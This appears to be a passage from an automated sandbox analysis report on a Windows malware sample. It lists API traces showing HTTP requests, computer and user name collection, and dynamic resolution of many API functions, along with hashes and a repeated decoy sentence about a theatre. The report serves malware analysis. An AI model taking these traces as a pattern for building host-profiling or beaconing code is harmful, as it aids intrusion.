                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeapProtectVirtual
                                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                    • API String ID: 1542196881-2218711628
                                    • Opcode ID: 522031eb575dc41a52fa366b046cb62ad6063f0a9c1364f2a5b34345f872bc18
                                    • Instruction ID: 512c7cf129ee48b586b9e5340f9cace5531848934c7129f0cf6536a5358a526c
                                    • Opcode Fuzzy Hash: 522031eb575dc41a52fa366b046cb62ad6063f0a9c1364f2a5b34345f872bc18
                                    • Instruction Fuzzy Hash: E14106607C33446AEE2DB7A79C6EEDDB756DF46600F60504EA9485B380EBB06900CB37
                                    Function 00FE6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00FFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00FFA7E6
                                      • Part of subcall function 00FE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00FE4839
                                      • Part of subcall function 00FE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00FE4849
                                      • Part of subcall function 00FFA740: lstrcpy.KERNEL32(01000E17,00000000), ref: 00FFA788
                                    • InternetOpenA.WININET(01000DFE,00000001,00000000,00000000,00000000), ref: 00FE62E1
                                    • StrCmpCA.SHLWAPI(?,0180EB30), ref: 00FE6303
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00FE6335
                                    • HttpOpenRequestA.WININET(00000000,GET,?,0180E5C0,00000000,00000000,00400100,00000000), ref: 00FE6385
                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00FE63BF
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FE63D1
                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00FE63FD
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00FE646D
                                    • InternetCloseHandle.WININET(00000000), ref: 00FE64EF
                                    • InternetCloseHandle.WININET(00000000), ref: 00FE64F9
                                    • InternetCloseHandle.WININET(00000000), ref: 00FE6503
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                    • String ID: ERROR$ERROR$GET
                                    • API String ID: 3749127164-2509457195
                                    • Opcode ID: 63780d9f777650afd734e616368d2701b7f39f90a7d4d5c2d516ead005d7fe82
                                    • Instruction ID: b0cdb527e6f4a6bfc1358dd670fe6e597f46089021fd3469bb12e23f3ef5535a
                                    • Opcode Fuzzy Hash: 63780d9f777650afd734e616368d2701b7f39f90a7d4d5c2d516ead005d7fe82
                                    • Instruction Fuzzy Hash: F1715D71A0025CABEB24EFA0DC49BEE7774BF44700F108199F20AAB5D4DBB46A85DF51
                                    Function 00FF78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1275 ff78e0-ff7937 GetProcessHeap RtlAllocateHeap GetComputerNameA 1276 ff7939-ff793e 1275->1276 1277 ff7942-ff7945 1275->1277 1278 ff7962-ff7972 1276->1278 1277->1278
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00FF7910
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FF7917
                                    • GetComputerNameA.KERNEL32(?,00000104), ref: 00FF792F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateComputerNameProcess
                                    • String ID:
                                    • API String ID: 1664310425-0
                                    • Opcode ID: 6294f956c57884385f501669d702a22a3203bb6ae6129381eb57fdd16cd9b7ba
                                    • Instruction ID: adbde3b151c847f16968fe3157bbc794e280e4a366cc889bd2f9f8a87db75775
                                    • Opcode Fuzzy Hash: 6294f956c57884385f501669d702a22a3203bb6ae6129381eb57fdd16cd9b7ba
                                    • Instruction Fuzzy Hash: 970186B1904209EBD724DF95DD49BAFFBB8FB04B21F104259FA45E3680C7B459008BA1
                                    Function 00FF7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00FE11B7), ref: 00FF7880
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FF7887
                                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00FF789F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateNameProcessUser
                                    • String ID:
                                    • API String ID: 1296208442-0
                                    • Opcode ID: 12adba91eefa430fa49c184205ae6650cc7c1900f862206a343b4687a84151ab
                                    • Instruction ID: 0be28ef317ca6872687b7fd8ee758be6a9540b2897436f99dd12496b8ebbd871
                                    • Opcode Fuzzy Hash: 12adba91eefa430fa49c184205ae6650cc7c1900f862206a343b4687a84151ab
                                    • Instruction Fuzzy Hash: 86F04FB1944208ABC724DF98D949FAEFBB8FB04711F10065AFA05A3A80C7B45504CBA1
                                    Function 00FE1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                    • Associated: 00000000.00000002.2080015463.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080029586.000000000122A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.000000000123E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000013CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080212290.00000000014DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080930491.00000000014DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081146910.000000000167A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081208805.000000000167B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fe0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitInfoProcessSystem
                                    • String ID:
                                    • API String ID: 752954902-0
                                    • Opcode ID: 97e1a46d90c00074139f430a68ff9a1a75e93baac076657feacab99a84c13664
                                    • Instruction ID: de6d5b014ac7b1ca957e2d74291032dfdf3396fe1a4927f0048ed4a43e9c82b0
                                    • Opcode Fuzzy Hash: 97e1a46d90c00074139f430a68ff9a1a75e93baac076657feacab99a84c13664
                                    • Instruction Fuzzy Hash: 13D05E7490030CEBCB24DFE1E84D6EDBB78FB08311F001554D90663B40EA305481CBA9
                                    Function 00FF9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 633 ff9c10-ff9c1a 634 ffa036-ffa0ca LoadLibraryA * 8 633->634 635 ff9c20-ffa031 GetProcAddress * 43 633->635 636 ffa0cc-ffa141 GetProcAddress * 5 634->636 637 ffa146-ffa14d 634->637 635->634 636->637 638 ffa216-ffa21d 637->638 639 ffa153-ffa211 GetProcAddress * 8 637->639 640 ffa21f-ffa293 GetProcAddress * 5 638->640 641 ffa298-ffa29f 638->641 639->638 640->641 642 ffa337-ffa33e 641->642 643 ffa2a5-ffa332 GetProcAddress * 6 641->643 644 ffa41f-ffa426 642->644 645 ffa344-ffa41a GetProcAddress * 9 642->645 643->642 646 ffa428-ffa49d GetProcAddress * 5 644->646 647 ffa4a2-ffa4a9 644->647 645->644 646->647 648 ffa4dc-ffa4e3 647->648 649 ffa4ab-ffa4d7 GetProcAddress * 2 647->649 650 ffa515-ffa51c 648->650 651 ffa4e5-ffa510 GetProcAddress * 2 648->651 649->648 652 ffa612-ffa619 650->652 653 ffa522-ffa60d GetProcAddress * 10 650->653 651->650 654 ffa67d-ffa684 652->654 655 ffa61b-ffa678 GetProcAddress * 4 652->655 653->652 656 ffa69e-ffa6a5 654->656 657 ffa686-ffa699 GetProcAddress 654->657 655->654 658 ffa708-ffa709 656->658 659 ffa6a7-ffa703 GetProcAddress * 4 656->659 657->656 659->658
                                    APIs
                                    • GetProcAddress.KERNEL32(75900000,017F5060), ref: 00FF9C2D
                                    • GetProcAddress.KERNEL32(75900000,017F4DE0), ref: 00FF9C45
                                    • GetProcAddress.KERNEL32(75900000,01809650), ref: 00FF9C5E
                                    • GetProcAddress.KERNEL32(75900000,018096B0), ref: 00FF9C76
                                    • GetProcAddress.KERNEL32(75900000,0180CF38), ref: 00FF9C8E
                                    • GetProcAddress.KERNEL32(75900000,0180D088), ref: 00FF9CA7
                                    • GetProcAddress.KERNEL32(75900000,017FB0A8), ref: 00FF9CBF
                                    • GetProcAddress.KERNEL32(75900000,0180D1D8), ref: 00FF9CD7
                                    • GetProcAddress.KERNEL32(75900000,0180CF80), ref: 00FF9CF0
                                    • GetProcAddress.KERNEL32(75900000,0180D0A0), ref: 00FF9D08
                                    • GetProcAddress.KERNEL32(75900000,0180CFB0), ref: 00FF9D20
                                    • GetProcAddress.KERNEL32(75900000,017F5100), ref: 00FF9D39
                                    • GetProcAddress.KERNEL32(75900000,017F4F60), ref: 00FF9D51
                                    • GetProcAddress.KERNEL32(75900000,017F4EA0), ref: 00FF9D69
                                    • GetProcAddress.KERNEL32(75900000,017F5160), ref: 00FF9D82
                                    • GetProcAddress.KERNEL32(75900000,0180D0B8), ref: 00FF9D9A
                                    • GetProcAddress.KERNEL32(75900000,0180D1A8), ref: 00FF9DB2
                                    • GetProcAddress.KERNEL32(75900000,017FB0F8), ref: 00FF9DCB
                                    • GetProcAddress.KERNEL32(75900000,017F4F40), ref: 00FF9DE3
                                    • GetProcAddress.KERNEL32(75900000,0180CFF8), ref: 00FF9DFB
                                    • GetProcAddress.KERNEL32(75900000,0180CF68), ref: 00FF9E14
                                    • GetProcAddress.KERNEL32(75900000,0180D0D0), ref: 00FF9E2C
                                    • GetProcAddress.KERNEL32(75900000,0180CFC8), ref: 00FF9E44
                                    • GetProcAddress.KERNEL32(75900000,017F5080), ref: 00FF9E5D
                                    • GetProcAddress.KERNEL32(75900000,0180D058), ref: 00FF9E75
                                    • GetProcAddress.KERNEL32(75900000,0180CF98), ref: 00FF9E8D
                                    • GetProcAddress.KERNEL32(75900000,0180D010), ref: 00FF9EA6
                                    • GetProcAddress.KERNEL32(75900000,0180D148), ref: 00FF9EBE
                                    • GetProcAddress.KERNEL32(75900000,0180D1C0), ref: 00FF9ED6
                                    • GetProcAddress.KERNEL32(75900000,0180D100), ref: 00FF9EEF
                                    • GetProcAddress.KERNEL32(75900000,0180CFE0), ref: 00FF9F07
                                    • GetProcAddress.KERNEL32(75900000,0180CF50), ref: 00FF9F1F
                                    • GetProcAddress.KERNEL32(75900000,0180D0E8), ref: 00FF9F38
                                    • GetProcAddress.KERNEL32(75900000,0180A6B8), ref: 00FF9F50
                                    • GetProcAddress.KERNEL32(75900000,0180D118), ref: 00FF9F68
                                    • GetProcAddress.KERNEL32(75900000,0180D130), ref: 00FF9F81
                                    • GetProcAddress.KERNEL32(75900000,017F50C0), ref: 00FF9F99
                                    • GetProcAddress.KERNEL32(75900000,0180D028), ref: 00FF9FB1
                                    • GetProcAddress.KERNEL32(75900000,017F4F80), ref: 00FF9FCA
                                    • GetProcAddress.KERNEL32(75900000,0180D160), ref: 00FF9FE2
                                    • GetProcAddress.KERNEL32(75900000,0180D1F0), ref: 00FF9FFA
                                    • GetProcAddress.KERNEL32(75900000,017F4E20), ref: 00FFA013
                                    • GetProcAddress.KERNEL32(75900000,017F4E40), ref: 00FFA02B
                                    • LoadLibraryA.KERNEL32(0180D040,?,00FF5CA3,01000AEB,?,?,?,?,?,?,?,?,?,?,01000AEA,01000AE3), ref: 00FFA03D
                                    • LoadLibraryA.KERNEL32(0180D178,?,00FF5CA3,01000AEB,?,?,?,?,?,?,?,?,?,?,01000AEA,01000AE3), ref: 00FFA04E
                                    • LoadLibraryA.KERNEL32(0180D070,?,00FF5CA3,01000AEB,?,?,?,?,?,?,?,?,?,?,01000AEA,01000AE3), ref: 00FFA060
                                    • LoadLibraryA.KERNEL32(0180D190,?,00FF5CA3,01000AEB,?,?,?,?,?,?,?,?,?,?,01000AEA,01000AE3), ref: 00FFA072
                                    • LoadLibraryA.KERNEL32(0180D208,?,00FF5CA3,01000AEB,?,?,?,?,?,?,?,?,?,?,01000AEA,01000AE3), ref: 00FFA083
                                    • LoadLibraryA.KERNEL32(0180CF20,?,00FF5CA3,01000AEB,?,?,?,?,?,?,?,?,?,?,01000AEA,01000AE3), ref: 00FFA095
                                    • LoadLibraryA.KERNEL32(0180D2E0,?,00FF5CA3,01000AEB,?,?,?,?,?,?,?,?,?,?,01000AEA,01000AE3), ref: 00FFA0A7
                                    • LoadLibraryA.KERNEL32(0180D2F8,?,00FF5CA3,01000AEB,?,?,?,?,?,?,?,?,?,?,01000AEA,01000AE3), ref: 00FFA0B8
                                    • GetProcAddress.KERNEL32(75FD0000,017F51A0), ref: 00FFA0DA
                                    • GetProcAddress.KERNEL32(75FD0000,0180D388), ref: 00FFA0F2
                                    • GetProcAddress.KERNEL32(75FD0000,01808F70), ref: 00FFA10A
                                    • GetProcAddress.KERNEL32(75FD0000,0180D280), ref: 00FFA123
                                    • GetProcAddress.KERNEL32(75FD0000,017F51C0), ref: 00FFA13B
                                    • GetProcAddress.KERNEL32(734B0000,017FAB58), ref: 00FFA160
                                    • GetProcAddress.KERNEL32(734B0000,017F52C0), ref: 00FFA179
                                    • GetProcAddress.KERNEL32(734B0000,017FABD0), ref: 00FFA191
                                    • GetProcAddress.KERNEL32(734B0000,0180D4C0), ref: 00FFA1A9
                                    • GetProcAddress.KERNEL32(734B0000,0180D430), ref: 00FFA1C2
                                    • GetProcAddress.KERNEL32(734B0000,017F5280), ref: 00FFA1DA
                                    • GetProcAddress.KERNEL32(734B0000,017F54E0), ref: 00FFA1F2
                                    • GetProcAddress.KERNEL32(734B0000,0180D3E8), ref: 00FFA20B
                                    • GetProcAddress.KERNEL32(763B0000,017F54C0), ref: 00FFA22C
                                    • GetProcAddress.KERNEL32(763B0000,017F54A0), ref: 00FFA244
                                    • GetProcAddress.KERNEL32(763B0000,0180D358), ref: 00FFA25D
                                    • GetProcAddress.KERNEL32(763B0000,0180D370), ref: 00FFA275
                                    • GetProcAddress.KERNEL32(763B0000,017F5500), ref: 00FFA28D
                                    • GetProcAddress.KERNEL32(750F0000,017FAC48), ref: 00FFA2B3
                                    • GetProcAddress.KERNEL32(750F0000,017FAB80), ref: 00FFA2CB
                                    • GetProcAddress.KERNEL32(750F0000,0180D268), ref: 00FFA2E3
                                    • GetProcAddress.KERNEL32(750F0000,017F5200), ref: 00FFA2FC
                                    • GetProcAddress.KERNEL32(750F0000,017F53A0), ref: 00FFA314
                                    • GetProcAddress.KERNEL32(750F0000,017FAC98), ref: 00FFA32C
                                    • GetProcAddress.KERNEL32(75A50000,0180D220), ref: 00FFA352
                                    • GetProcAddress.KERNEL32(75A50000,017F5320), ref: 00FFA36A
                                    • GetProcAddress.KERNEL32(75A50000,01809090), ref: 00FFA382
                                    • GetProcAddress.KERNEL32(75A50000,0180D3A0), ref: 00FFA39B
                                    • GetProcAddress.KERNEL32(75A50000,0180D298), ref: 00FFA3B3
                                    • GetProcAddress.KERNEL32(75A50000,017F5240), ref: 00FFA3CB
                                    • GetProcAddress.KERNEL32(75A50000,017F5360), ref: 00FFA3E4
                                    • GetProcAddress.KERNEL32(75A50000,0180D310), ref: 00FFA3FC
                                    • GetProcAddress.KERNEL32(75A50000,0180D3B8), ref: 00FFA414
                                    • GetProcAddress.KERNEL32(75070000,017F5460), ref: 00FFA436
                                    • GetProcAddress.KERNEL32(75070000,0180D478), ref: 00FFA44E
                                    • GetProcAddress.KERNEL32(75070000,0180D400), ref: 00FFA466
                                    • GetProcAddress.KERNEL32(75070000,0180D238), ref: 00FFA47F
                                    • GetProcAddress.KERNEL32(75070000,0180D4F0), ref: 00FFA497
                                    • GetProcAddress.KERNEL32(74E50000,017F5520), ref: 00FFA4B8
                                    • GetProcAddress.KERNEL32(74E50000,017F5260), ref: 00FFA4D1
                                    • GetProcAddress.KERNEL32(75320000,017F53E0), ref: 00FFA4F2
                                    • GetProcAddress.KERNEL32(75320000,0180D328), ref: 00FFA50A
                                    • GetProcAddress.KERNEL32(6F060000,017F5540), ref: 00FFA530
                                    • GetProcAddress.KERNEL32(6F060000,017F5380), ref: 00FFA548
                                    • GetProcAddress.KERNEL32(6F060000,017F5480), ref: 00FFA560
                                    • GetProcAddress.KERNEL32(6F060000,0180D418), ref: 00FFA579
                                    • GetProcAddress.KERNEL32(6F060000,017F51E0), ref: 00FFA591
                                    • GetProcAddress.KERNEL32(6F060000,017F5220), ref: 00FFA5A9
                                    • GetProcAddress.KERNEL32(6F060000,017F5400), ref: 00FFA5C2
                                    • GetProcAddress.KERNEL32(6F060000,017F52A0), ref: 00FFA5DA
                                    • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 00FFA5F1
                                    • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 00FFA607
                                    • GetProcAddress.KERNEL32(74E00000,0180D490), ref: 00FFA629
                                    • GetProcAddress.KERNEL32(74E00000,01809000), ref: 00FFA641
                                    • GetProcAddress.KERNEL32(74E00000,0180D340), ref: 00FFA659
                                    • GetProcAddress.KERNEL32(74E00000,0180D250), ref: 00FFA672
                                    • GetProcAddress.KERNEL32(74DF0000,017F52E0), ref: 00FFA693
                                    • GetProcAddress.KERNEL32(6F9C0000,0180D460), ref: 00FFA6B4
                                    • GetProcAddress.KERNEL32(6F9C0000,017F5420), ref: 00FFA6CD
                                    • GetProcAddress.KERNEL32(6F9C0000,0180D2B0), ref: 00FFA6E5
                                    • GetProcAddress.KERNEL32(6F9C0000,0180D3D0), ref: 00FFA6FD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080029586.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
